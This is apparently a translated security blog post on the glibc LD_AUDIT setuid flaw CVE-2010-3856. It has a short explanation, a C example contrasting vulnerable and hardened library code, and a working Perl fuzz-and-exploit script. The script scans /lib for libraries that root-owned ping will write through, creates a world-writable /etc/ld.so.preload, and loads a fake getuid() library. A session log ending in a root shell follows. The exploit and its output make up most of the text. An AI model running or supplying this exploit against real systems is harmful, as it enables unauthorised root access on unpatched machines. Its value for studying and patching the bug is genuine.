
[Translation] Fuzzing and exploitation of CVE-2010-3856

2014-06-12 00:40

The vulnerability Tavis Ormandy disclosed in late 2010, "GNU C library dynamic linker will dlopen arbitrary DSOs during setuid loads", sent most users scrambling to patch their systems.

An unprivileged user could hard-link a SUID program and run it through a file descriptor to spoof $ORIGIN (the companion bug, CVE-2010-3847), or use the LD_AUDIT mode of ld.so (CVE-2010-3856) to execute arbitrary code with root privileges.

The official advisory names only a couple of potentially unsafe libraries:

liblftp-task.so.0 and libpcprofile.so

In practice there are certainly more unsafe libraries than these two, so the fact that your system does not ship them does not mean it is not vulnerable.
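What makes a library such as libpcprofile.so "unsafe" is worth spelling out, because it is exactly what the fuzzer further down hunts for. The C below is an added example, not code from the PT Security post or from glibc: it puts the vulnerable pattern (a constructor that opens whatever path an environment variable names, so that when ld.so pulls the DSO into a setuid process via LD_AUDIT the file is created by root) next to a hardened form that ignores the variable in an AT_SECURE process, the way secure_getenv(3) does. The variable name PROBE_OUTPUT and the functions output_path_vulnerable, output_path_hardened and is_secure_process are this example's own.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef __GLIBC__
#include <sys/auxv.h>
#endif

/*
 * Vulnerable pattern (the libpcprofile.so / libmemusage.so shape): the
 * environment is trusted unconditionally.  Loaded into a setuid process via
 * LD_AUDIT, this tells root to open a file named by the unprivileged caller.
 * Returns the path to open, or NULL to do nothing.
 */
const char *output_path_vulnerable(const char *env_value, int is_secure)
{
    (void)is_secure;            /* never consulted: that is the bug */
    return env_value;
}

/*
 * Hardened pattern, equivalent to what secure_getenv(3) does for you:
 * drop the variable entirely in an AT_SECURE process, and otherwise accept
 * only an absolute path so a relative name cannot land in a directory the
 * caller chose through the current working directory.
 */
const char *output_path_hardened(const char *env_value, int is_secure)
{
    if (is_secure)
        return NULL;
    if (env_value == NULL || env_value[0] != '/')
        return NULL;
    return env_value;
}

/* AT_SECURE is set by the kernel for setuid/setgid/file-capability execs. */
int is_secure_process(void)
{
#ifdef __GLIBC__
    return getauxval(AT_SECURE) != 0;
#else
    return getuid() != geteuid() || getgid() != getegid();   /* weaker fallback */
#endif
}

/* Runs as soon as ld.so maps the DSO, before main() and even if ld.so later
 * rejects the object as an audit module for lacking la_version (the
 * libmemusage.so case in the session output below). */
__attribute__((constructor))
static void probe_init(void)
{
    const char *path = output_path_hardened(getenv("PROBE_OUTPUT"),
                                            is_secure_process());
    if (path == NULL)
        return;
    int fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0600);
    if (fd < 0)
        return;
    dprintf(fd, "probe: pid=%d uid=%d euid=%d\n",
            (int)getpid(), (int)getuid(), (int)geteuid());
    close(fd);
}

int main(void)
{
    /* The same attacker-controlled value as seen from a setuid process. */
    const char *attacker = "/etc/ld.so.preload";
    printf("vulnerable library would open: %s\n",
           output_path_vulnerable(attacker, 1) ? attacker : "(nothing)");
    printf("hardened library would open:   %s\n",
           output_path_hardened(attacker, 1) ? attacker : "(nothing)");
    return 0;
}
```

Built with `gcc -shared -fPIC -o libprobe.so probe.c` and loaded with `PROBE_OUTPUT=/tmp/probe.log LD_AUDIT=./libprobe.so ./anyprogram` (a non-setuid program; a patched ld.so no longer lets LD_AUDIT pull arbitrary libraries into a setuid process), the constructor appends a line to /tmp/probe.log owned by the caller's own uid. The vulnerable variant, loaded the same way into a setuid binary on an unpatched system, is precisely how the fuzzer's marker files under /tmp/fuzz/ end up created by root.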

The public exploit creates a backdoor file and has cron run it as root, but that approach is not universally applicable.

After some research we wrote a fuzzer that tests the system and, if a library of the kind Tavis Ormandy found is present, exploits it on the spot.

We also added an exploit that builds on the fuzzing result: it abuses /etc/ld.so.preload to gain privileges, which lets the attacker get root as quickly as possible and matters during a penetration test. The exploit follows:

#!/usr/bin/perl
# Fuzz-and-exploit script for CVE-2010-3856 (glibc LD_AUDIT in setuid binaries).
# Stage 1 fuzzes every shared object in @libdirs: each one is loaded as an
# LD_AUDIT module into a SUID binary (ping) while every upper-case identifier
# found in the library is tried as an environment variable pointing into
# $tempdir. A library that creates that file while running as root is
# exploitable.
# Stage 2 reuses the winning library/variable pair to create a world-writable
# /etc/ld.so.preload and point it at a getuid() override.
use strict;
use warnings;
use POSIX qw(ceil);

my $ptxt = "

[The GNU C library dynamic linker will dlopen arbitrary DSOs
during setuid loads]
[desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

";
print $ptxt;
$| = 1;                        # unbuffered STDOUT so the progress bar updates
# you can add your own paths to lib folders here
my @libdirs = ("/lib");
my $tempdir = "/tmp/fuzz/";    # temp directory; files created here mark vulnerable libs
mkdir($tempdir);

# count the candidate files so the progress bar can be scaled
my $total = 0;
foreach my $libdir (@libdirs) {
    opendir(my $dir, $libdir) or die "cannot open $libdir: $!";
    my @lf = readdir($dir);
    closedir $dir;
    $total = $total + scalar(@lf) - 2;   # ignore . and ..
}
my $step  = ceil($total / 50);
my $stepp = 0;
print "0%" . " " x 6 . "20%" . " " x 6 . "40%" . " " x 6 . "60%" .
      " " x 6 . "80%" . " " x 6 . "100%\n";
print "[";
foreach my $libdir (@libdirs) {
    opendir(my $dir, $libdir) or die "cannot open $libdir: $!";
    my @libfiles = readdir($dir);
    closedir $dir;
    foreach my $libfile (@libfiles) {
        $stepp++;
        if ($stepp == $step) { print "."; $stepp = 0; }
        if (($libfile ne ".") && ($libfile ne "..")) {
            # every upper-case identifier in the library is a candidate
            # environment variable name (e.g. PCPROFILE_OUTPUT)
            my @dump = `strings $libdir/$libfile`;
            foreach my $dline (@dump) {
                if ($dline =~ /^([A-Z_0-9]+)$/) {
                    chomp($dline);
                    # run the SUID binary with the library as audit module and
                    # the candidate variable pointing into $tempdir
                    my $ccc = `LD_AUDIT="$libfile" $dline="$tempdir$libfile-$dline" ping >/dev/null 2>&1`;
                }
            }
        }
    }
}
print "]\n";

print "Fuzzing done. Thank you for using!\n";

# any file that appeared in $tempdir was created by a root-privileged ping
opendir(my $dir, $tempdir) or die "cannot open $tempdir: $!";
my @fuzzList = readdir($dir);
closedir $dir;
my $libToExploit = ""; my $argToExploit = "";
if (scalar(@fuzzList) > 2) {
    foreach my $fuzzFile (@fuzzList) {
        if ($fuzzFile ne "." && $fuzzFile ne "..") {
            # file name is "<library>-<VARIABLE>"; the variable never contains '-'
            my ($lib, $param) = $fuzzFile =~ /(.*)-(.*)/;
            print "Success: vuln lib - $lib ; arg - $param\n";
            if ((-e "$tempdir$fuzzFile") && (!-d "$tempdir$fuzzFile")) {
                $libToExploit = $lib;
                $argToExploit = $param;
            }
        }
    }
} else {
    print "Fail. No vuln libs found. Try another target ;)\n";
    exit();
}

# umask 0 makes the root-created /etc/ld.so.preload world-writable, so the
# unprivileged user can then fill it with the path of a fake getuid()
my $shCode = qq(#!/bin/sh
umask 0
LD_AUDIT=EXP_LIBRARY EXP_ARGUMENT=/etc/ld.so.preload ping
echo "[+] creating /tmp/getuid.so"
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -shared -fPIC /tmp/getuid.c -o /tmp/getuid.so
echo "/tmp/getuid.so" > /etc/ld.so.preload
);

if ($libToExploit ne "" && $argToExploit ne "") {
    $shCode =~ s/EXP_LIBRARY/$libToExploit/gi;
    $shCode =~ s/EXP_ARGUMENT/$argToExploit/gi;
    open(my $sh, ">", "spl.sh") or die "cannot write spl.sh: $!";
    print $sh $shCode;
    close($sh);
    chmod(0755, "spl.sh");
    system("./spl.sh");
    print "Hehe.. Type 'su' and be awesome!\n";
}


Example of usage:

dummy@bt:~$ perl spl.pl


[The GNU C library dynamic linker will dlopen arbitrary
DSOs during setuid loads]
[desc: Fuzz and exploit for RHEL5 / CentOS5 / Ubuntu]

0% 20% 40% 60% 80% 100%
[......................................]
Fuzzing done. Thank you for using!
Success: vuln lib - libpcprofile.so ; arg - PCPROFILE_OUTPUT
Success: vuln lib - libmemusage.so ; arg - MEMUSAGE_OUTPUT

Memory usage summary: heap total: 0, heap peak: 0, stack peak: 0
total calls total memory failed calls
malloc| 0 0 0
realloc| 0 0 0
(nomove:0, dec:0, free:0)
calloc| 0 0 0
free| 0 0
Histogram for block sizes:
ERROR: ld.so: object 'libmemusage.so' cannot be loaded as
audit interface: undefined symbol: la_version; ignored.
Usage:
ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+] creating /tmp/getuid.so
Hehe.. Type 'su' and be awesome!
dummy@bt:~$ id
uid=0(root) gid=1001(dummy) euid=1001(dummy) groups=1001(dummy)
dummy@bt:~$ su
root@bt:/home/dummy# exit

via @ptsec

Original article: http://blog.ptsecurity.com/2011/04/fuzzing-and-exploitation-of.html

Unless otherwise stated, reposts of this article should credit 91ri.org
Source: www.91ri.org/9349.html
